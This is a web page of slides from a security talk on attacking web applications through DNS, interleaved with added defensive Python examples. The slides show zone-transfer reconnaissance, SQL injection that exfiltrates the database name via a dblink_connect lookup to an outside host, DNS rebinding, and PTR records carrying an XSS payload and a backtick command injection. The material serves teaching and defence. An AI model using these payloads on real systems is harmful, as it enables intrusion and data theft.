Hands-on DNSSEC Deployment
Hands-on DNSSEC DeploymentHands-on DNSSEC Deployment
Hands-on DNSSEC Deployment
 
Automate Your FME Server Installs, Take a Five Minute Break
Automate Your FME Server Installs, Take a Five Minute BreakAutomate Your FME Server Installs, Take a Five Minute Break
Automate Your FME Server Installs, Take a Five Minute Break
 
Living on the edge
Living on the edgeLiving on the edge
Living on the edge
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at Opera
 
Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...
Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...
Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...
 
DNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAIL
DNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAILDNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAIL
DNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAIL
 
URL to HTML
URL to HTMLURL to HTML
URL to HTML
 
Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]
Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]
Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
 

Último

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Último (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 

4Developers: Dns vs webapp

  • 2. $ whoami •  Specjalista ds. Bezpieczeństwa Systemów IT •  Security Researcher •  Bug Hunter
  • 3. DNS
  • 4. DNS $ host -t ns . . name server l.root-servers.net. . name server f.root-servers.net. . name server g.root-servers.net. . name server d.root-servers.net. . name server j.root-servers.net. . name server a.root-servers.net. . name server k.root-servers.net. . name server m.root-servers.net. . name server c.root-servers.net. . name server e.root-servers.net. . name server b.root-servers.net. . name server h.root-servers.net. . name server i.root-servers.net.
  • 5. DNS
  • 6. DNS $ host -t ns pl. pl name server a-dns.pl. pl name server c-dns.pl. pl name server d-dns.pl. pl name server e-dns.pl. pl name server f-dns.pl. pl name server g-dns.pl. pl name server h-dns.pl. pl name server i-dns.pl.
  • 7. DNS
  • 8. DNS $ host -t ns wp.pl wp.pl name server ns2.wp.pl. wp.pl name server ns1.wp.pl. wp.pl name server ns1.task.gda.pl.
  • 9. DNS
  • 10. DNS $ host -t ns poczta.wp.pl poczta.wp.pl has no NS record $ host -t A poczta.wp.pl poczta.wp.pl has address 212.77.101.148
  • 11. Typy rekordów localhost IN A 127.0.0.1 ipv6 IN AAAA 2001:6d8:10:1667::6667 wow IN NS ns1.evil.com. go IN CNAME google.com. ala IN TXT "ala ma kota" 1 IN PTR 8.8.8.8 @ IN MX 10 smtp.evil.com. * IN A 142.62.4.13
  • 13. Information Disclosure •  svn.evil.com •  git.evil.com •  mysql.evil.com •  www2.evil.com •  test.evil.com •  beta.evil.com •  dev.evil.com •  vpn.evil.com
  • 14. Information Disclosure •  svn.evil.com •  git.evil.com •  mysql.evil.com •  www2.evil.com •  test.evil.com •  beta.evil.com •  dev.evil.com •  vpn.evil.com •  (…) $ host orange.pl orange.pl has address 80.48.169.1 orange.pl mail is handled by 5 mx5.orange.pl. orange.pl mail is handled by 0 mx.orange.pl. $ host 80.48.169.1 1.169.48.80.in-addr.arpa domain name pointer www2.orange.pl. $ host 80.48.169.2 2.169.48.80.in-addr.arpa domain name pointer mobile2.orange.pl. $ host 80.48.169.3 3.169.48.80.in-addr.arpa domain name pointer xwi2.orange.pl. (…)
  • 20. $ dig @fns2.42.pl televoice.pl axfr ; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr ; (2 servers found) ;; global options: +cmd televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl. 1361872990 10800 3600 604800 10800 televoice.pl. 86400 IN A 91.199.22.117 www.admin.televoice.pl. 86400 IN A 91.199.22.117 dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com. ftp.televoice.pl. 86400 IN A 91.199.22.117 kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com. old.televoice.pl. 86400 IN A 91.199.22.117 poczta.televoice.pl. 86400 IN A 91.199.22.117 sip.televoice.pl. 86400 IN A 195.162.16.201 sklep.televoice.pl. 86400 IN A 91.199.22.117 www.sklep.televoice.pl. 86400 IN A 91.199.22.117 www.sklep2.televoice.pl. 86400 IN A 91.199.22.117 sql.televoice.pl. 86400 IN A 91.199.22.117 sql2.televoice.pl. 86400 IN A 91.199.22.117 start.televoice.pl. 86400 IN CNAME ghs.google.com.
  • 21. Zone Transfer $ ./zone.pl gov.sl Checking ns1.neoip.com... failed. Checking ns2.neoip.com... OK! gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. ( 10800 ;serial 3600 ;refresh 604800 ;retry 21600 ;expire 3600 ) ;minimum gov.sl. 21600 IN NS ns2.neoip.com. gov.sl. 21600 IN NS ns1.neoip.com. statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com. statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com. tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM. pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com. pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com. mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com. mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com. mofa.gov.sl. 21600 IN NS ns1.abac.com.
  • 22. Zone Transfer bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. ( 2014082629 ;serial 21600 ;refresh 3600 ;retry 604800 ;expire 86400 ) ;minimum bi. 86400 IN TXT "Generation Time: 1409056444" bi. 86400 IN NS bi.cctld.authdns.ripe.net. bi. 86400 IN NS ns.nic.bi. bi. 86400 IN NS dns.princeton.edu. bi. 86400 IN NS ns1.nic.bi. bi. 86400 IN NS anyns.nic.bi. bi. 86400 IN NS ns-bi.afrinic.net. 100.bi. 86400 IN NS ns11.xincache.com. 100.bi. 86400 IN NS ns12.xincache.com. 101domain.bi. 86400 IN NS ns1.101domain.com. 101domain.bi. 86400 IN NS ns2.101domain.com. 101domain.bi. 86400 IN NS ns5.101domain.com. 101domains.bi. 86400 IN NS ns1.101domain.com. 101domains.bi. 86400 IN NS ns2.101domain.com. 101domains.bi. 86400 IN NS ns5.101domain.com.
  • 23. Zone Transfer an ao arpa bb bd bf bi bs bv capetown ci cv cw cy do durban eg er gp gq gt gy kh int joburg ke kg kw mg mo mp mw ni np pe pf pg py sc sj sl sv tel to zw -  ripe.net -  gnu.org -  poznan.pl
  • 27. Data Exfiltration •  Error Based SQL Injection
  • 28. Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection
  • 29. Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection •  Time-Based SQL Injection
  • 30. Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection •  Time-Based SQL Injection •  Data Exfiltration
  • 31. Data Exfiltration $ cat /etc/bind/named.conf (…) logging{ channel example_log { file "/var/log/dns.log" versions 3 size 2m; severity info; print-severity yes; print-time yes; print-category yes; }; category "queries" { example_log; }; };
  • 32. Data Exfiltration $ host onet.pl localhost Using domain server: Name: localhost Address: 127.0.0.1#53 Aliases: onet.pl has address 213.180.141.140 onet.pl mail is handled by 1 mx.poczta.onet.pl. $ tail -n 3 /var/log/dns.log 15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#46730: query: onet.pl IN A + (127.0.0.1) 15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#33283: query: onet.pl IN AAAA + (127.0.0.1) 15-Aug-2014 16:35:57.534 queries: info: client 127.0.0.1#41577: query: onet.pl IN MX + (127.0.0.1)
  • 33. Data Exfiltration INSERT (…) VALUES ('123'); è 123 INSERT (…) VALUES ('x'||user||'x'); è xtestx INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x
  • 34. Data Exfiltration INSERT (…) VALUES ('123'); è 123 INSERT (…) VALUES ('x'||user||'x'); è xtestx INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host=pwnd.uid0.pl user=1 password=2')) ||'x' ); DNS Request
• 35-36. Data Exfiltration
INSERT (…) VALUES (
    'x'||(SELECT dblink_connect('host='||(SELECT current_database())||'.uid0.pl user=1 password=2'))||'x'
);                                                  → DNS Request
$ tail -n 1 /var/log/dns.log
26-Aug-2014 13:08:22.668 queries: info: client 173.194.90.82#38036: query: postgres.uid0.pl IN AAAA - ED (80.86.91.39)
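The log line above is the defender's side of this technique: the stolen value leaves the database as the leftmost label of a DNS name. Below is an added example, not from the talk, of detection logic run over that BIND query-log format. The first sample line copies slide 36; the other lines, the client 10.0.0.7 and the hex labels are constructed. Two rules are applied: a label that looks like encoded data, and one client asking for many distinct names under a single zone. The single `postgres.uid0.pl` query looks like an ordinary hostname and is caught only by the second rule, which is why per-client volume matters more than label shape for this kind of exfiltration.

```python
"""Detection over BIND query logs: spot DNS-based exfiltration (constructed example)."""
import re
from collections import defaultdict

# Format of BIND's "queries" channel as logged on the slides:
#   <date> <time> queries: info: client <ip>#<port>: query: <qname> IN <qtype> <flags> (<server ip>)
QUERY_RE = re.compile(
    r"^(?P<ts>\S+ \S+) queries: info: client (?P<client>[^#]+)#\d+: "
    r"query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)

# Constructed sample: line 1 is the query shown on slide 36; the remaining
# lines are invented to look like a burst of hex-encoded data from the same
# client, plus one unrelated local query that must not be flagged.
SAMPLE_LOG = """\
26-Aug-2014 13:08:22.668 queries: info: client 173.194.90.82#38036: query: postgres.uid0.pl IN AAAA - ED (80.86.91.39)
26-Aug-2014 13:08:23.101 queries: info: client 173.194.90.82#38041: query: www.uid0.pl IN A - ED (80.86.91.39)
26-Aug-2014 13:08:23.417 queries: info: client 173.194.90.82#38044: query: 6173646a6b6c.uid0.pl IN A - ED (80.86.91.39)
26-Aug-2014 13:08:23.905 queries: info: client 173.194.90.82#38049: query: 71776572747975696f70.uid0.pl IN A - ED (80.86.91.39)
26-Aug-2014 13:08:24.233 queries: info: client 173.194.90.82#38052: query: 7a78637662.uid0.pl IN A - ED (80.86.91.39)
26-Aug-2014 13:08:24.612 queries: info: client 10.0.0.7#51000: query: onet.pl IN A + (127.0.0.1)
"""

HEX_RE = re.compile(r"^[0-9a-f]+$")


def parse_log(text):
    """Return one dict (ts, client, qname, qtype) per parseable log line."""
    return [m.groupdict() for m in map(QUERY_RE.match, text.splitlines()) if m]


def looks_encoded(label, min_len=10):
    """Heuristic for a data-carrying label: at least `min_len` characters and
    either pure hex, or alphanumeric with a high share of digits. Thresholds
    are a starting point; tune them against your own zone's real names."""
    label = label.lower()
    if len(label) < min_len:
        return False
    if HEX_RE.match(label):
        return True
    digits = sum(ch.isdigit() for ch in label)
    return label.isalnum() and digits / len(label) >= 0.3


def suspicious_queries(log_text, zone, burst_threshold=3):
    """Return (client, name, reason) findings for queries under `zone`.

    Rule 1 flags individual names with an encoded-looking label.
    Rule 2 flags a client that asked for at least `burst_threshold` distinct
    names under the zone in this log window; that is what catches a plain
    `<dbname>.zone` lookup whose label looks like a normal hostname."""
    suffix = "." + zone
    findings = []
    names_per_client = defaultdict(set)
    for rec in parse_log(log_text):
        qname = rec["qname"].rstrip(".")
        if not qname.endswith(suffix):
            continue
        data = qname[: -len(suffix)]          # the labels in front of the zone
        names_per_client[rec["client"]].add(data)
        if any(looks_encoded(label) for label in data.split(".")):
            findings.append((rec["client"], qname, "encoded-label"))
    for client, names in names_per_client.items():
        if len(names) >= burst_threshold:
            findings.append((client, zone, f"burst:{len(names)}"))
    return findings


if __name__ == "__main__":
    for finding in suspicious_queries(SAMPLE_LOG, "uid0.pl"):
        print(*finding)
```

In production the zone to watch is whatever your authoritative server serves, and the burst rule should run over a sliding time window rather than a whole file; the point of the example is that the authoritative server's own query log is the one place where a `dblink_connect`-driven lookup is guaranteed to show up.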
• 39. DNS Rebinding
$ cat .htaccess
<Files btc.txt>
    Order deny,allow
    Deny from all
    Allow from 127.0.0.1
</Files>
• 43-44. DNS Rebinding
Request no. 1
Request no. 2
$ for a in `seq 1 10`; do host rebind.uid0.pl ; done
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
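The alternating answers above are what defeats the `.htaccess` rule on slide 39: the browser really does connect from 127.0.0.1 on the second request, so a source-IP allow-list is satisfied. The following is an added example, not from the talk, of the three places a defender can break that chain. `SLIDE_ANSWERS` copies slide 44; the `pins` dictionary and the hostnames in the Host-header check are constructed.

```python
"""DNS rebinding guards: resolver filter, client pinning, Host check (constructed example)."""
import ipaddress

# Answers for rebind.uid0.pl exactly as they alternate on slide 44.
SLIDE_ANSWERS = ["127.0.0.1", "80.86.91.39", "127.0.0.1", "80.86.91.39"]


def is_internal(addr):
    """True for addresses that a name on the public Internet must never
    resolve to: loopback, RFC 1918 / ULA, link-local, unspecified, reserved.
    IPv4-mapped IPv6 (::ffff:a.b.c.d) is unwrapped first so it cannot be
    used to smuggle 127.0.0.1 past an IPv4-only check."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)


def filter_answers(answers, allow_internal=False):
    """Resolver-side guard (the idea behind dnsmasq's --stop-dns-rebind):
    strip internal addresses from the answer set of an external name.
    Returns (kept, dropped)."""
    kept, dropped = [], []
    for addr in answers:
        (kept if allow_internal or not is_internal(addr) else dropped).append(addr)
    return kept, dropped


def pinned_address(hostname, answers, pins):
    """Client-side pinning: the first acceptable address for a hostname is
    stored in `pins` and reused for later requests, so a low-TTL flip between
    two addresses cannot move the origin onto the victim's own machine."""
    if hostname in pins:
        return pins[hostname]
    kept, _ = filter_answers(answers)
    if not kept:
        return None
    pins[hostname] = kept[0]
    return kept[0]


def host_header_ok(host_header, expected):
    """Server-side guard for a service bound to 127.0.0.1: after rebinding the
    browser still sends the attacker's hostname in Host, so an IP allow-list
    like the .htaccess on slide 39 is not enough; require a Host you own."""
    host = host_header.strip().lower()
    if host.startswith("["):                      # [::1]:8080
        end = host.find("]")
        host = host[1:end] if end > 0 else host
    elif host.count(":") == 1:                    # localhost:8080
        host = host.split(":")[0]
    return host.rstrip(".") in expected


if __name__ == "__main__":
    print(filter_answers(SLIDE_ANSWERS))          # (['80.86.91.39', '80.86.91.39'], ['127.0.0.1', '127.0.0.1'])
    print(host_header_ok("rebind.uid0.pl", {"localhost", "127.0.0.1"}))   # False
```

Of the three, the Host-header check is the one the application owner controls directly; the resolver filter belongs on the corporate recursive resolver and the pinning in the HTTP client or browser.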
• 47. Domain Takeover
$ host -t ns getclouder.com
getclouder.com name server cumulus.getclouder.com.
getclouder.com name server nimbus.getclouder.com.
• 50. Domain Takeover
$ host -t ns clouder.us
clouder.us name server ns2.clev1.net.
clouder.us name server ns1.clev1.net.
• 51-53. Domain Takeover
ns1.clev1.net has address 181.224.128.6
ns2.clev1.net has address 198.20.77.76
nimbus.getclouder.com has address 181.224.128.6
cumulus.getclouder.com has address 198.20.77.76
• 59.
$ dig +trace ns1.clev1.net
(…)
clev1.net.              172800  IN  NS  ns1.clev1.net.
clev1.net.              172800  IN  NS  ns2.clev1.net.
;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms

ns1.clev1.net.          86400   IN  A   8.8.4.4
ns1.clev1.net.          86400   IN  A   8.8.8.8
ns1.clev1.net.          86400   IN  NS  cumulus.getclouder.com.
ns1.clev1.net.          86400   IN  NS  nimbus.getclouder.com.
;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms
• 62.
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl
[16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu
[16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk
[16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj
[16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de
[16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de
[16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns2.siteground144.com
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns1.siteground144.com
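Slides 47 to 62 describe a delegation problem from the attacker's point of view: a domain whose NS names live in a zone, and on hosts, that its owner does not control. The following is an added example, not from the talk, of the audit a domain owner can run over `host -t ns` and `host` output to find that situation before someone else does. The lookup tables copy the names and addresses from slides 47 to 53; the `owned_zones` / `owned_ips` sets and the `nowhere.example` case are constructed, and the two-label `registrable()` rule is a simplification (real code should consult the Public Suffix List).

```python
"""Delegation audit for a domain's NS set (constructed example, not the talk's code)."""

# Constructed lookup tables copying slides 47-53: NS names per zone and the
# addresses `host` returned for them. clouder.us is served by ns1/ns2.clev1.net,
# and those names resolve to the same addresses as getclouder.com's servers.
NS_RECORDS = {
    "getclouder.com": ["cumulus.getclouder.com", "nimbus.getclouder.com"],
    "clouder.us": ["ns2.clev1.net", "ns1.clev1.net"],
}
A_RECORDS = {
    "ns1.clev1.net": ["181.224.128.6"],
    "ns2.clev1.net": ["198.20.77.76"],
    "nimbus.getclouder.com": ["181.224.128.6"],
    "cumulus.getclouder.com": ["198.20.77.76"],
}


def registrable(name):
    """Zone that owns `name`, assuming a two-label registrable suffix
    (ns1.clev1.net -> clev1.net). Use the Public Suffix List in real code."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def audit_delegation(domain, owned_zones, owned_ips,
                     ns_records=NS_RECORDS, a_records=A_RECORDS):
    """Return (nameserver, finding) pairs for `domain`'s NS set.

    unresolvable-ns       the NS name has no address: a lame delegation
    ns-zone-not-owned     the NS name lives in a zone you do not control; if that
                          zone lapses or changes hands, your domain goes with it
    ns-address-not-owned  the NS resolves to an address outside your infrastructure
    """
    findings = []
    for ns in ns_records.get(domain, []):
        ns = ns.rstrip(".").lower()
        addrs = a_records.get(ns, [])
        if not addrs:
            findings.append((ns, "unresolvable-ns"))
            continue
        zone = registrable(ns)
        if zone not in owned_zones:
            findings.append((ns, f"ns-zone-not-owned:{zone}"))
        foreign = sorted(ip for ip in addrs if ip not in owned_ips)
        if foreign:
            findings.append((ns, "ns-address-not-owned:" + ",".join(foreign)))
    return findings


def shared_ns_addresses(ns_records=NS_RECORDS, a_records=A_RECORDS):
    """Map address -> zones whose nameservers resolve to it, keeping only
    addresses shared by more than one zone. Whoever controls such a host
    answers authoritatively for every zone in the list."""
    by_ip = {}
    for zone, servers in ns_records.items():
        for ns in servers:
            for ip in a_records.get(ns.rstrip(".").lower(), []):
                by_ip.setdefault(ip, set()).add(zone)
    return {ip: sorted(zones) for ip, zones in by_ip.items() if len(zones) > 1}


if __name__ == "__main__":
    for item in audit_delegation("clouder.us", {"clouder.us"}, set()):
        print(*item)
    print(shared_ns_addresses())
```

Run this periodically against live `host` output for every zone you own; the `ns-zone-not-owned` finding is the one to treat as a standing risk even when the third-party zone is healthy today.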
• 67-68. Blind XSS
$ host 77.254.88.134
134.88.254.77.in-addr.arpa domain name pointer 77-254-88-134.adsl.inetia.pl.
• 70. Blind XSS
$ host -t ns 88.254.77.in-addr.arpa
88.254.77.in-addr.arpa name server rumba.inetia.pl.
88.254.77.in-addr.arpa name server chacha.inetia.pl.
• 72. Blind XSS
zone "192/26.122.204.87.in-addr.arpa." IN {
    type master;
    allow-transfer { 109.173.165.151; };
    check-names ignore;
    file "/etc/bind/87.204.122.210";
};
• 73. Blind XSS
$TTL 3600
@       IN SOA ns1.ropchain.org. admin.ropchain.org. (
                2014011417 ; serial
                14400      ; refresh
                3600       ; retry
                604800     ; expire
                10800 )    ; minimum
@       IN NS  ns1.ropchain.org.
@       IN NS  ns2.ropchain.org.
1       IN PTR ropchain.org.
210     IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
211     IN PTR a`uname`a.x.uid0.pl.
212     IN PTR ropchain.org.
• 74. Blind XSS
$ host 87.204.122.210
210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.
210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
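The PTR records on slides 73 and 74 work because `check-names ignore` lets the zone carry characters a hostname may not contain, and because a log viewer or a shell script then treats the reverse-lookup result as trusted text. Below is an added example, not from the talk, of how an application that displays or processes reverse DNS should handle that value: validate it against hostname syntax, escape it on output regardless, refuse it for command construction, and optionally require forward-confirmed reverse DNS. `SAMPLE_PTRS` copies the three records from slide 73; `FORWARD_A` is a constructed forward zone, since the slides do not show ropchain.org's A record.

```python
"""Safe handling of reverse-DNS results (constructed example, not the talk's code)."""
import html
import re

# RFC 1123 hostname label: letters, digits, hyphen; 1-63 chars; no leading or
# trailing hyphen. Anything a PTR answer contains outside this is data, not a name.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")

# Constructed: PTR answers copied from slide 73 (one benign, two hostile).
SAMPLE_PTRS = {
    "87.204.122.212": "ropchain.org.",
    "87.204.122.210": 'f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.',
    "87.204.122.211": "a`uname`a.x.uid0.pl.",
}

# Constructed forward zone used for the FCrDNS check; not from the slides.
FORWARD_A = {"ropchain.org": ["87.204.122.212"]}


def is_valid_hostname(name):
    """Syntactic check only: every label matches LABEL_RE, total <= 253 chars."""
    name = name.rstrip(".")
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.split("."))


def render_client(ip, ptr):
    """HTML table cells a log viewer should emit for one reverse lookup.
    Invalid names are never rendered; valid ones are still escaped."""
    if ptr is None or not is_valid_hostname(ptr):
        return f'<td>{html.escape(ip)}</td><td class="bad-ptr">(invalid PTR)</td>'
    return f"<td>{html.escape(ip)}</td><td>{html.escape(ptr.rstrip('.'))}</td>"


def shell_safe_host(ptr):
    """Value acceptable as one argv element for subprocess (never for a shell
    string). Returns None for anything that is not a syntactic hostname, which
    rejects the backtick payload on slide 73 outright."""
    return ptr.rstrip(".") if is_valid_hostname(ptr) else None


def fcrdns_ok(ip, ptr, forward_lookup):
    """Forward-confirmed reverse DNS: accept the PTR only if the name it
    gives resolves back to `ip`. `forward_lookup(name)` returns a list of
    addresses; inject a real resolver in production."""
    if not is_valid_hostname(ptr):
        return False
    return ip in forward_lookup(ptr.rstrip("."))


if __name__ == "__main__":
    for ip, ptr in SAMPLE_PTRS.items():
        print(render_client(ip, ptr), fcrdns_ok(ip, ptr, lambda n: FORWARD_A.get(n, [])))
```

The syntax check is what makes the rest cheap: a value that passes it cannot carry `<`, `"` or a backtick, so escaping becomes defense in depth rather than the only barrier, and the FCrDNS check additionally ties the displayed name to an address the name's owner actually controls.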